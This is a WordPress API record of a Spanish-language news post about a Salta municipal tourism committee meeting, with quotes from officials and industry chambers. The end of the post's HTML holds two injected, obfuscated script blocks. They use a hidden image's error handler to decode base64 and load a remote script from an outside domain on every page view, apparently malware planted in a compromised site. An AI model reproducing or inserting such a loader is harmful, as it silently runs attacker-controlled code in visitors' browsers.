{"id":1230,"date":"2022-08-04T13:04:06","date_gmt":"2022-08-04T16:04:06","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1230"},"modified":"2025-08-14T00:39:29","modified_gmt":"2025-08-14T03:39:29","slug":"se-llevo-a-cabo-una-nueva-reunion-del-comite-de-turismo-municipal","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1230","title":{"rendered":"Se llev\u00f3 a cabo\u00a0una nueva reuni\u00f3n del Comit\u00e9 de Turismo Municipal\u00a0"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#cc0961\"><strong><em>Se analiz\u00f3 el movimiento tur\u00edstico de la temporada invernal y se present\u00f3 el calendario de actividades para lo que resta del a\u00f1o, entre otros puntos.<\/em><\/strong><\/h3>\n\n\n\n<p>La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, realiz\u00f3 la reuni\u00f3n correspondiente a julio&nbsp;de 2022 del Comit\u00e9 de Turismo Municipal. El encuentro se concret\u00f3 en el&nbsp;Sal\u00f3n&nbsp;de Usos M\u00faltiples del Centro C\u00edvico Municipal.<\/p>\n\n\n\n<p>Durante la reuni\u00f3n se analiz\u00f3 el movimiento tur\u00edstico de la temporada invernal&nbsp;y se present\u00f3 el resumen estad\u00edstico del Observatorio de Turismo. Adem\u00e1s, se present\u00f3 el calendario&nbsp;de las pr\u00f3ximas acciones entre las que&nbsp;figur\u00f3 la participaci\u00f3n de la ciudad de Salta en la Feria Internacional de Turismo, entre otros.<\/p>\n\n\n\n<p>Se dieron a conocer tambi\u00e9n, las pr\u00f3ximas acciones de promoci\u00f3n y eventos que se realizar\u00e1n&nbsp;hasta diciembre de 2022.<\/p>\n\n\n\n<p>\u00abHicimos un balance de lo que fue esta temporada de invierno que dej\u00f3 muy buenos resultados, tambi\u00e9n&nbsp;hicimos un balance de lo que fueron los primeros seis meses del a\u00f1o, donde vemos que en turismo sigue en una instancia de recuperaci\u00f3n. Presentamos el plan de acciones&nbsp;de promociones para el resto del a\u00f1o, en el que se marca ese compromiso que tiene la Municipalidad con el sector y, tal como lo plante\u00f3 la intendenta, Bettina Romero, no solo acompa\u00f1arlo para que se recupere sino tambi\u00e9n para que crezca\u00bb&nbsp;indic\u00f3 el secretario de Turismo, Fernando Garc\u00eda Soria.<\/p>\n\n\n\n<p>Desde la C\u00e1mara de Turismo de Salta, su presidente, Gustavo Di M\u00e9cola, remarc\u00f3: \u00abLa ciudad trabaja cada vez mucho mejor, se nota la cantidad de eventos que se est\u00e1n haciendo. Es muy bueno que nos escuchen, que el trabajo entre el sector p\u00fablico y privado hoy est\u00e9 mucho m\u00e1s pulido. Felicitaciones a la ciudad que este a\u00f1o estuvo m\u00e1s completa\u00bb.<\/p>\n\n\n\n<p>En la oportunidad, estuvo presente la presidenta de la Comisi\u00f3n de Turismo del Concejo Deliberante, In\u00e9s Bennasar, quien destac\u00f3 que \u00abes muy bueno presenciar la planificaci\u00f3n y programaci\u00f3n de actividades que viene desarrollando el ejecutivo municipal, en materia de turismo hasta fin de a\u00f1o con una agenda completa. Un balance positivo para todo el sector. Estamos trabajando con distintos proyectos y propuestas. De hecho, tenemos la gran noticia de que se avanz\u00f3 en lo que es habilitaciones comerciales\u00bb.<\/p>\n\n\n\n<p>\u00abQuiero felicitar al equipo de turismo municipal y recordarles que desde la C\u00e1mara estamos a disposici\u00f3n para intercambiar ideas y seguir haci\u00e9ndolas realidad\u00bb afirm\u00f3 Juan Lucero, presidente de C\u00e1mara Hotelera Gastron\u00f3mica y Afines de Salta.<\/p>\n\n\n\n<p>Finalmente, el presidente del Salta Conventions &amp; Visitors Bureau, Daniel Astorga, resalt\u00f3: \u201ctenemos un trabajo en equipo con el municipio y estamos muy contentos con los datos que escuchamos y lo que viene que es un trabajo entre ambos sectores. El compromiso que tiene el municipio con el sector es muy importante. Me llam\u00f3 la atenci\u00f3n que por segunda vez la ciudad est\u00e9 en la Feria Internacional de Turismo (FIT) que nunca se hab\u00eda dado. Es muy bueno el arreglo de la ciudad y el compromiso para salte\u00f1os y turistas para que disfrutemos m\u00e1s de la capital salte\u00f1a\u00bb.<\/p>\n\n\n\n<p>Participaron de la reuni\u00f3n, representando al municipio, el secretario de Cultura y Turismo, Fernando Garc\u00eda Soria;&nbsp;el subsecretario de Turismo, Juan Manuel Contreras; la subsecretaria&nbsp;de Gesti\u00f3n, Emilia San\u00edn, la directora de Estad\u00edsticas por el Observatorio Tur\u00edstico municipal, Julia Vera Ar\u00e1oz&nbsp;y la directora de Promoci\u00f3n, Josefina Morales.<\/p>\n\n\n\n<p>En representaci\u00f3n del Concejo Deliberante, la presidenta de la comisi\u00f3n de Turismo, Deporte y Recreaci\u00f3n, In\u00e9s Bennasar, y por la Secretar\u00eda de Turismo provincial, Nadia Loza.<\/p>\n\n\n\n<p>Por el sector privado, lo hicieron: Gustavo Di M\u00e9cola, presidente de la C\u00e1mara de Turismo de Salta; Juan Lucero, presidente de la C\u00e1mara Hotelera Gastron\u00f3mica y Afines de Salta;&nbsp; Michele Safar&nbsp; por&nbsp; la Asociaci\u00f3n de Hoteles de Turismo \u2013 Filial Salta y Daniel Astorga, titular del Salta Convention &amp; Visitors Bureau.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"1233\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-b-1024x681.jpg\" alt=\"\" class=\"wp-image-1233\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-b-1024x681.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-b-300x199.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-b-768x511.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-b-696x463.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-b-1068x710.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-b-632x420.jpg 632w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-b.jpg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"1232\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-c-1024x681.jpeg\" alt=\"\" class=\"wp-image-1232\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-c-1024x681.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-c-300x199.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-c-768x511.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-c-696x463.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-c-1068x710.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-c-632x420.jpeg 632w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-c.jpeg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"1231\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-d-1024x681.jpeg\" alt=\"\" class=\"wp-image-1231\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-d-1024x681.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-d-300x199.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-d-768x511.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-d-696x463.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-d-1068x710.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-d-632x420.jpeg 632w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/comite-turismo-julio-d.jpeg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/prensa.municipalidadsalta.gob.ar\/se-llevo-a-cabo-una-nueva-reunion-del-comite-de-turismo-municipal\/#\" target=\"_blank\" rel=\"noreferrer noopener\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_4-8-2022_1307_prensa.municipalidadsalta.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-1234\" width=\"126\" height=\"55\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se analiz\u00f3 el movimiento tur\u00edstico de la temporada invernal y se present\u00f3 el calendario de actividades para lo que resta del a\u00f1o, entre otros puntos. La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, realiz\u00f3 la reuni\u00f3n correspondiente a julio&nbsp;de 2022 del Comit\u00e9 de Turismo Municipal. El encuentro se concret\u00f3 en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1235,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-1230","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1230"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1230"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1230\/revisions"}],"predecessor-version":[{"id":7408,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1230\/revisions\/7408"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1235"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1230"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1230"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1230"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}